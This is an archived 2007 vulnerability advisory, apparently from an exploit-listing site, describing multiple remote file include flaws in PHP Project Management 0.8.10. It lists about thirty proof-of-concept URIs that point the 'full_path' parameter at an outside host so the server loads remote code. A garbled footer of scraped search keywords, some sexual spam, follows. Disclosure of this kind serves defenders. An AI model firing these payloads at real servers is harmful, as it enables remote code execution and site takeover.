exploits , vulnerabilities , articles , PHP Project Management Multiple Remote File Include Vulnerabilities
| Title |
PHP Project Management Multiple Remote File Include Vulnerabilities |
| Published |
2007-10-21-12:00AM |
| Updated |
2007-10-24-07:36PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
GoLd_M discovered this vulnerability. |
| Vulnerable |
PHP Project Management PHP Project Management 0.8.10
|
| Not Vulnerable |
|
| Code |
An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/modules/certinfo/index.php?full_path=http://www.example2.com http://www.example.com/modules/emails/index.php?full_path=http://www.example2.com http://www.example.com/modules/events/index.php?full_path=http://www.example2.com http://www.example.com/modules/fax/index.php?full_path=http://www.example2.com http://www.example.com/modules/files/index.php?full_path=http://www.example2.com http://www.example.com/modules/files/list.php?full_path=http://www.example2.com http://www.example.com/modules/groupadm/index.php?full_path=http://www.example2.com http://www.example.com/modules/history/index.php?full_path=http://www.example2.com http://www.example.com/modules/info/index.php?full_path=http://www.example2.com http://www.example.com/modules/log/index.php?full_path=http://www.example2.com http://www.example.com/modules/mail/index.php?full_path=http://www.example2.com http://www.example.com/modules/messages/index.php?full_path=http://www.example2.com http://www.example.com/modules/organizations/index.php?full_path=http://www.example2.com http://www.example.com/modules/phones/index.php?full_path=http://www.example2.com http://www.example.com/modules/presence/index.php?full_path=http://www.example2.com http://www.example.com/modules/projects/index.php?full_path=http://www.example2.com http://www.example.com/modules/projects/summary.inc.php?full_path=http://www.example2.com http://www.example.com/modules/projects/list.php?full_path=http://www.example2.com http://www.example.com/modules/reports/index.php?full_path=http://www.example2.com http://www.example.com/modules/search/index.php?full_path=http://www.example2.com http://www.example.com/modules/snf/index.php?full_path=http://www.example2.com http://www.example.com/modules/syslog/index.php?full_path=http://www.example2.com http://www.example.com/modules/tasks/searchsimilar.php?full_path=http://www.example2.com http://www.example.com/modules/tasks/index.php?full_path=http://www.example2.com http://www.example.com/modules/tasks/summary.inc.php?full_path=http://www.example2.com http://www.example.com/modules/useradm/index.php?full_path=http://www.example2.com http://www.example.com/ajax/loadsplash.php?full_path=http://www.example2.com http://www.example.com/blocks/birthday.php?full_path=http://www.example2.com http://www.example.com/blocks/events.php?full_path=http://www.example2.com http://www.example.com/blocks/help.php?full_path=http://www.example2.com |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Wed, 16 Dec 2009 16:16:51 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
XES www.events mina Teensex.co sll.cc www.comfis 2...Fmedia bunga citr 20tm4.cn mambo Remo mambo+Remo Www.sex.u. 2algeria hourse fuc www.indian WWW.SEXyph news for c WWW.arabic news searc sexxmax.co sex angeli Fickshun kerio www.pandam 200 /compo www.423433 Crack \r\n maxcpm.inf blu filim% coithienth Wal.sex ?????? ??? news for c Dewipersik Zen Cart. Www.shakil paris hilt linux kern www.nyblg. remote inc Free sexy 200 /compo WWW.Sexto indain mas Tamil+vide Microsoft WWW.Sexto 18 Year gi www.fcd518 pho
|